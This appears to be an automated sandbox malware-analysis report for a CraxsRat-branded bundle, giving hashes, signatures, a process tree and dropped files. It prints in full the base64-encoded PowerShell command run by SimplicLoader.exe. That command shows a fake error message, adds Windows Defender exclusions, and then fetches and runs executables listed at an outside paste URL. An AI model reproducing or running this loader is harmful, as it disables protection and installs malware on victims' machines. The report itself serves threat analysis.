Overview
overview
10Static
static
7AgileDotNe...me.dll
windows7-x64
1AgileDotNe...me.dll
windows10-2004-x64
1ChangeLog.html
windows7-x64
1ChangeLog.html
windows10-2004-x64
1CraxsRat.exe.xml
windows7-x64
1CraxsRat.exe.xml
windows10-2004-x64
1GeoIPCitys.dll
windows7-x64
1GeoIPCitys.dll
windows10-2004-x64
1LiveCharts...ms.dll
windows7-x64
1LiveCharts...ms.dll
windows10-2004-x64
1LiveCharts.Wpf.dll
windows7-x64
1LiveCharts.Wpf.dll
windows10-2004-x64
1LiveCharts.dll
windows7-x64
1LiveCharts.dll
windows10-2004-x64
1MetroSet UI.dll
windows7-x64
1MetroSet UI.dll
windows10-2004-x64
1NAudio.dll
windows7-x64
1NAudio.dll
windows10-2004-x64
1SimplicLoader.exe
windows7-x64
10SimplicLoader.exe
windows10-2004-x64
10System.IO....le.dll
windows7-x64
1System.IO....le.dll
windows10-2004-x64
1Vip.Notification.dll
windows7-x64
1Vip.Notification.dll
windows10-2004-x64
1WinMM.Net.dll
windows7-x64
1WinMM.Net.dll
windows10-2004-x64
1res/GeoIP/GeoIP.dat
windows7-x64
3res/GeoIP/GeoIP.dat
windows10-2004-x64
3Analysis
-
max time kernel
133s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
27-04-2023 13:16
Behavioral task
behavioral1
Sample
AgileDotNet.VMRuntime.dll
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
AgileDotNet.VMRuntime.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
ChangeLog.html
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
ChangeLog.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
CraxsRat.exe.xml
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
CraxsRat.exe.xml
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
GeoIPCitys.dll
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
GeoIPCitys.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
LiveCharts.WinForms.dll
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
LiveCharts.WinForms.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
LiveCharts.Wpf.dll
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
LiveCharts.Wpf.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral13
Sample
LiveCharts.dll
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
LiveCharts.dll
Resource
win10v2004-20230221-en
Behavioral task
behavioral15
Sample
MetroSet UI.dll
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
MetroSet UI.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral17
Sample
NAudio.dll
Resource
win7-20230220-en
Behavioral task
behavioral18
Sample
NAudio.dll
Resource
win10v2004-20230221-en
Behavioral task
behavioral19
Sample
SimplicLoader.exe
Resource
win7-20230220-en
Behavioral task
behavioral20
Sample
SimplicLoader.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral21
Sample
System.IO.Compression.ZipFile.dll
Resource
win7-20230220-en
Behavioral task
behavioral22
Sample
System.IO.Compression.ZipFile.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral23
Sample
Vip.Notification.dll
Resource
win7-20230220-en
Behavioral task
behavioral24
Sample
Vip.Notification.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral25
Sample
WinMM.Net.dll
Resource
win7-20230220-en
Behavioral task
behavioral26
Sample
WinMM.Net.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral27
Sample
res/GeoIP/GeoIP.dat
Resource
win7-20230220-en
Behavioral task
behavioral28
Sample
res/GeoIP/GeoIP.dat
Resource
win10v2004-20230220-en
General
-
Target
SimplicLoader.exe
-
Size
75KB
-
MD5
72fb96fbbee9fa0c1c25030152f8a802
-
SHA1
22d1be899c8a2aca51420a9ae3f89c5528d7e347
-
SHA256
1f08b5e59bf1ec24b9be2c2211dccf22a6651202d29a9be6d8d2f99b127a9274
-
SHA512
bbcee824c437c0069d174d2b34ed42cecef72c22fee9418144af64083d8833af9572b3670bacfcfc1eb5cfa3da269aa289ee10d9d2eeb2442763e1dda1e3248d
-
SSDEEP
768:ol9EoLDR6GjcJUsg6O/scbnY+kVgbu7FpMtqwH7pRMAfPdqoxgGgKrVuua:S9RuU/da7HM1Zgero
Malware Config
Extracted
https://rentry.org/yui9p/raw
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1208 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SimplicLoader.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation SimplicLoader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1208 powershell.exe 1208 powershell.exe 1920 powershell.exe 1920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
SimplicLoader.exepowershell.exedescription pid process target process PID 3548 wrote to memory of 1208 3548 SimplicLoader.exe powershell.exe PID 3548 wrote to memory of 1208 3548 SimplicLoader.exe powershell.exe PID 1208 wrote to memory of 1920 1208 powershell.exe powershell.exe PID 1208 wrote to memory of 1920 1208 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SimplicLoader.exe"C:\Users\Admin\AppData\Local\Temp\SimplicLoader.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAdwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHcAbABzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATQBTAFYAQwBQADEAMQA0AC4AZABsAGwAIABpAHMAIABtAGkAcwBzAGkAbgBnACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHgAdgBmACMAPgA7ACIAOwA8ACMAeQBwAG4AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBuAHoAdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB5AGMAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHgAbAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeQB1AGkAOQBwAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBkAGcAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAdwBtACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAaAB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBiAHcAaAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHUAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB4AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGEAcgB6ACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#wls#>[System.Windows.Forms.MessageBox]::Show('MSVCP114.dll is missing!','','OK','Error')<#xvf#>;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
360B
MD5f12c5f3d2c0079e1eaa951894d9868df
SHA1238307ffe58fbaf2d1d175efe4ee579306514477
SHA2565993b01080690bc9fb72dd556b155a6e7e9747038426810b3fb76f97daff4ac6
SHA51208abf2c517743dfb53f289acba4c1a03bed4203fc0ae9574cfab4ec84537b1d6926509d1d1c3fa867e78fd903931de3fec3149bfacc5a9b081970ad3247e1b94
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mvnbtnfj.tbb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1208-140-0x000001D75B050000-0x000001D75B072000-memory.dmpFilesize
136KB
-
memory/1208-145-0x000001D75B0D0000-0x000001D75B0E0000-memory.dmpFilesize
64KB
-
memory/1208-146-0x000001D75B0D0000-0x000001D75B0E0000-memory.dmpFilesize
64KB
-
memory/1208-156-0x000001D75B0D0000-0x000001D75B0E0000-memory.dmpFilesize
64KB
-
memory/1920-157-0x000001AD29C60000-0x000001AD29C70000-memory.dmpFilesize
64KB
-
memory/1920-158-0x000001AD29C60000-0x000001AD29C70000-memory.dmpFilesize
64KB
-
memory/3548-133-0x0000000000B40000-0x0000000000B58000-memory.dmpFilesize
96KB